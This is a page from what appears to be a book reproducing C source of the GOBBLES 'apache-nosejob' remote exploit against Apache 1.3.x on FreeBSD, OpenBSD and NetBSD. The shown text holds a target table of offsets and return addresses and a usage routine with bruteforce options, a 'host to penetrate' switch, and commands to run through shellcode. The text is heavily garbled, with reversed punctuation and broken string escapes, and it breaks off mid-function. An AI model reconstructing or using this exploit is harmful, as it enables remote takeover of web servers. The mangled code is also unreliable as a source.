Page 299 - بسم الله الرحمن الرحيم
P. 299
/* int repzero; /* and \\\\0\\'z this many times
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36"\\\ }
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36"\\\ }
OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,"\\\ }
,{ 36
,{ NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42"\\\ }
;victim ,{
} (void usage(void
;int i
printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache-
;("\\\nosejob.c\\\\n\\\\n
;("\\\printf(\\\"Usage: ./apache-nosejob <-switches> -h host[:80]\\\\n
;("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n
;("\\\printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n
;("\\\printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n
;("\\\printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n
;("\\\printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,
;("\\\0x080e0000/nbsd.\\\\n
printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to
;("\\\overwrite\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n
;("\\\printf(\\\" Optional stuff:\\\\n
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for
;("\\\shellcode reply\\\\n
printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode
299
